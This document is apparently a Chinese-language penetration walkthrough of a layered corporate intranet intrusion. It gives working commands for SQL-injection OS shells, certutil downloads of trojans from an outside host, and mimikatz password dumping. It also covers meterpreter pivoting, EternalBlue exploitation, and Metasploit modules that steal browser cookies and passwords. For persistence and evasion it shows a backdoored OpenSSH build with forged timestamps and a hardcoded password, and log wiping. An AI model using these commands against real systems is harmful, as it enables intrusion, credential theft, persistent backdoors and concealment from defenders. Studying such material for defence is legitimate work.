一、企业网拓扑图
二、获取一层内网控制权
1.注入点
http://111.47.13.66:88/Content.aspx?ClassId=1&id=5
执行命令可用
sqlmap.py -u "http://111.47.13.66:88/Content.aspx?ClassId=1&id=5" --dbms "mssql" --os-shell
制作木马文件
2.下载执行木马
certutil -urlcache -split -f http://111.47.13.68:8888/rh.exe c:\\rh.exe
c:\\rh.exe
3.下载执行teamviewer
certutil -urlcache -split -f http://111.47.13.68:8888/tv.exe c:\\tv.exe
taskkill /f /im tver.exe
4.会话隔离导致无桌面
5.下载执行runas降权成功执行
certutil -urlcache -split -f http://111.47.13.68:8888/rs.exe c:\\rs.exe
rs.exe winlogon.exe "tv.exe -o 2.txt"
6.加载mimikatz读取明文密码
7.arp发现IP信息
8.添加路由转发规则 session1
9.制作socks代理通道
root@kali:/# vim /etc/proxychains.conf
10.proxychains+nmap访问扫描目标IP
proxychains nmap -sT -sV -Pn -n 192.168.1.222 -p 80,3389,445
11.将3389端口对外转发
meterpreter > portfwd add -l 2222 -r 192.168.1.222 -p 3389
12.将目标80端口对外转发做进一步内网渗透
meterpreter > portfwd add -l 2233 -r 192.168.1.222 -p 80
13.利用s2-045,写webshell并执行木马反弹,成功控制这台2003机器
三、获取二层内网控制权(目标win7)
1.查看arp信息以及子网信息
2.添加路由转发规则以及socks通道
3.转发并扫描目标机器445端口漏洞
4.使用永恒之蓝进行漏洞利用
5.注入添加系统账户dll文件
有时会导致目标系统出错重启
6.转发3389端口进行连接
四、获取二层内网控制权(目标2008)
1.获取跳板机长期控制权
2.其他过程略,转发出445端口,使用永恒之蓝进行利用
3.由于该二层内网机器是断网环境,如果反弹shell则需要一层跳板机做反弹端口转发,这里使用Port2Port.exe,并采用内存执行的方式实现。
4.生成dll木马文件,并用双子星后门加载,成功回连shell
5.主机信息收集
6.调用post/windows/gather/enum_applications模块获取目标主机上的软件安装信息
7.调用post/windows/gather/dumplinks获取目标主机上最近访问过的文档、链接信息
8.调用post/windows/gather/enum_ie后渗透模块,读取目标主机IE浏览器cookies等缓存信息,嗅探目标主机登录过的各类账号密码
命令:run post/windows/gather/enum_ie
9.运行getgui模块开启远程桌面并添加账户,
10.转发3389端口并成功连接
11.入侵痕迹擦除
在渗透利用过程中难免留下日志等信息痕迹,使用clearev命令擦除痕迹后再跑。
命令:clearev
五、获取二层内网控制权(目标linux)
1.查看和扫描arp信息发现主机10.10.10.100
2.配置路由转发并扫描发现6379端口redis可能存在漏洞
3.本地生成ssh公钥、私钥文件
4.代理连接方式写入公钥文件到目标redis
5.访问redis配置公钥到.ssh目标并更名
6.转发目标22端口,并采用私钥成功登陆
7.添加ssh后门
mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old
mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old
上传后门版openssh源文件
vi versio.h
vi includes.h
编译安装:
编译过程中可能出现的报错:
configure: error: *** zlib.h missing – please install first or check config.log
#yum install zlib-devel
configure: error: *** Can’t find recent OpenSSL libcrypto (see config.log for details) ***
#yum install openssl openssl-devel
shell-# ./configure --prefix=/usr --sysconfdir=/etc/ssh
shell-# make && make install
shell-# cp ssh_config sshd_config /etc/ssh/
修改文件时间:
touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config
touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config
重启服务
shell-# /etc/init.d/sshd restart
登入后门:
ssh -l root IP
password:13995845381
echo >/root/.bash_history //清空操作日志